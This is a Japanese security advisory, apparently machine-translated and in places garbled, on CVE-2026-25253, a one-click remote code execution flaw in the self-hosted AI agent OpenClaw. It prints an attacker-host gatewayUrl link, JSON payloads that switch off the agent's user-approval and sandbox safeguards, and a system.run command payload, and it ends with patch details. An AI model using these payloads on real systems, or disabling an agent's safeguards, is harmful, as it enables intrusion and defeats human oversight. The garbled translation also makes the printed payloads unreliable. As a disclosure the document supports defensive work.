1.OpenClawの紹介
OpenClaw(旧称Clawdbot、Moltbot)は、オープンソースの自律型ロボットです。AI2025年11月に発表されたパーソナル・アシスタント・プロジェクト。このプロジェクトは、大規模言語モデル(Large Language Models:LLM)の機能と実世界のシステム操作特権を深く統合した、セルフホスト可能でローカルに動作するAIエージェントをユーザーに提供することを目的としている。ユーザーのデータをクラウドに保存するSaaS型アシスタントとは異なり、OpenClawはユーザー自身のデバイス(ラップトップ、ホームサーバー、VPSなど)にデプロイされるため、データのプライバシーと制御が保証される。 。
OpenClawは、iMessage、WhatsApp、Slackなどの幅広いインスタント・メッセージング・アプリと統合することができ、ファイルの読み書きやシェル・コマンドの実行など、昇格したシステム特権が付与されている。ユーザーによって割り当てられた複雑なタスクを完了する しかし、この "神モード "特権設計もまた、深刻なセキュリティの脆弱性の舞台となる。しかし、この "神モード "の特権設計は、深刻なセキュリティの脆弱性の舞台も用意している。
2.OpenClawの脆弱性原理
CVE-2026-25253CVSS 3.1のスコアが8.8(高リスク)のこの脆弱性は、トークンの開示、クロスサイトWebSocketハイジャック、サンドボックスのエスケープを含む一連のロジックの欠陥に根ざしている。攻撃全体は、リンクをクリックすることにより、ユーザーの操作なしで発動することができる。
2.1 脆弱性の連鎖
脆弱性は、下表に示すように、3つの重要なリンクが連動して構成されている:
|
環状リング |
ドキュメント/モジュール |
欠陥の説明 |
|
トークン漏れ |
app-settings.ts |
コントロール・インターフェースは、URLクエリ・パラメータを盲目的に信頼し、それをゲートウェイウル。 |
app-lifecycle.ts |
存在するゲートウェイウル設定後すぐに、新しいゲートウェイへの接続が自動的に開始されます。 |
|
ゲートウェイ.ts |
WebSocketコネクションを確立する際、自動的に高い特権を持つauthToken届けるゲートウェイウル。 |
|
|
クロスサイト・ウェブソケット・ハイジャッキング(CSWSH) |
WebSocketサーバー |
への接続要求に対する返答はなかった。起源ヘッダを認証に使用し、任意のソースからの接続を許可する。 |
|
サンドボックスからの脱出 |
API |
攻撃者は盗まれたオペレータ.adminそしてオペレーター承認パーミッションを設定し、APIコールでセキュリティ保護メカニズムを無効にする。 |
第一に、ユーザーが悪意のあるファイルをクリックすると、そのファイルには悪意がない。ゲートウェイウルパラメータへのリンク(例えば http://victim_openclaw.com?gatewayUrl=ws://attacker.com:8080 )、OpenClaw のフロントエンド・アプリケーションは、攻撃者のサーバー・アドレスを認証なしの新しいゲートウェイ・アドレスとして保存します。そしてアプリケーションは直ちにこの新しいアドレスでウェブソケット接続を確立しようとし、接続リクエストにローカルに保存された認証済みのauthToken.自分のサーバーをリッスンしている攻撃者は、このトークンを簡単に傍受することができます。 。
第二に、ブラウザは WebSocket 接続に対して同一生成元ポリシー(SOP)を適用しないため、OpenClaw の WebSocket サーバーは、WebSocket 接続の認証に失敗します。起源リクエスト・ヘッダは、クロスサイトWebSocketハイジャックの可能性につながる。つまり、攻撃者は悪意のあるウェブサイト上でJavaScriptを使用し、被害者のブラウザを「踏み台」として動作させることができる。ローカルホストWebSocket 接続は、OpenClaw のインスタンスが 。
最後に、盗んだ昇格特権トークンを使って、攻撃者は API 呼び出しによって OpenClaw の組み込みセキュリティ機構をオフにすることができます。これらのメカニズムはもともと、危険なコマンドを実行する前にユーザー確認を促すプロンプト・インジェクションや、コンテナ化されたサンドボックス内でのコード実行など、AI モデルにおける悪意のある振る舞いから防御するために使用されていました。攻撃者は、ホスト上で直接任意のコマンドを実行する能力を得るために、これらの保護を簡単に無効にすることができます。 。
図1:OpenClawのアーキテクチャとCVE-2026-25253脆弱性パス
図 2: OpenClaw ワンクリック RCE 利用チェーン
3.オープンクローPOC/EXP
セキュリティ研究者のマヴ・レヴィン(Mav Levin)氏が明らかにしたところによると、「ワンクリックRCE」攻撃のエクスプロイト・チェーンは、被害者が悪意のあるウェブページにアクセスしてから数ミリ秒以内に完了するという。
図 3: OpenClaw CVE-2026-25253 攻撃の流れ
3.1 攻撃の流れ
1.クリックを誘発する被害者は、攻撃者が管理するウェブページ(例えば、以下のようなもの)にアクセスするよう誘導される。 アタッカー・ドット・コム).
2.トークン窃盗ページのJavaScriptは、被害者のOpenClawインスタンスを指すURLをバックグラウンドで開き、攻撃者のサーバーを指すURLも同時に開きます。ゲートウェイウルパラメータを使用する。authToken攻撃者に送られる。
3.ローカル接続と特権ページ上の別のJavaScriptは、盗まれたトークンを使ってCSWSHの脆弱性を悪用し、被害者のローカルのOpenClaw WebSocketサービス(デフォルトは、OpenClawのWebSocketサービスである。 ws://localhost:18789).
4.セキュリティを無効にする攻撃スクリプトはAPIリクエストを送信し、ユーザー確認とサンドボックスモードを無効にします。
ユーザーが確認したペイロードを無効にする:
{"メソッド": "exec.approvals.set","params": { 「デフォルト: { 「セキュリティ: フル, 「尋ねる: オフ } }}
ペイロードのサンドボックスを無効にするスルーコンフィグパッチリクエストtools.exec.hostに設定する。ゲートウェイ。
5.任意のコードを実行する最後に、攻撃スクリプトはノード呼び出しリクエストを呼び出しシステムランコマンドを実行し、被害者ホスト上で任意のコードを実行する。
RCEペイロードの例:
{「タイプ: "req",「id: “4”,"メソッド": "node.invoke","params": {"nodeId": 「メイン,「コマンド: "system.run","params": {"cmd": "bash -c 'echo hacked > /tmp/hacked'"" } }}
図4:クロスサイト・ウェブソケット・ハイジャッキング(CSWSH)の仕組みの詳細
4.脆弱性改善プログラム
OpenClawチームは迅速に対応し、修正プログラムをリリースした! 2026.1.29.主な修正点は、欠陥のある自動接続の連鎖を断ち切ることと、ユーザーとのやりとりのセキュリティを強化することである。
"このパッチは、ゲートウェイURL確認モーダルを追加し、プロンプトなしで自動接続する動作を削除します。"
具体的な修正点は以下の通り:
確認ダイアログボックスの追加いつゲートウェイウルこのパラメータを使用してゲートウェイアドレスを変更すると、確認ダイアログボックスがポップアップ表示され、ユーザーが手動で変更を確認するよう求められます。
自動接続の解除ユーザーの明示的な許可なしに新しいゲートウェイに自動的に接続する動作を完全に削除しました。
公式発表では、全ユーザーに直ちにアップグレードすることを推奨している。 v2026.1.29 またはそれ以上でなければならない。また、認証トークンが漏洩したと思われる場合は、直ちに、認証トークンをローテーションする必要があります。 。
5.参考文献
[1] CSO. Clawdbotエンタープライズ・インテリジェント・ボディ・アプリケーション・セキュリティ強化ガイド.” 2026-01-31.
[2] Levin, Mav. "1-Click RCE To Steal Your Moltbot Data and Keys (CVE-2026-25253)"。 depthfirst.
[3] National Vulnerability Database. "CVE-2026-25253"。
[4] GitHub. "Incorrect Resource Transfer Between Spheres in openclaw/openclaw." ghsa-g8p2-7wf7-98mq.
元記事はChief Security Officerによるもので、転載の際はhttps://www.cncso.com/jp/openclaw-one-click-remote-code-execution.html。
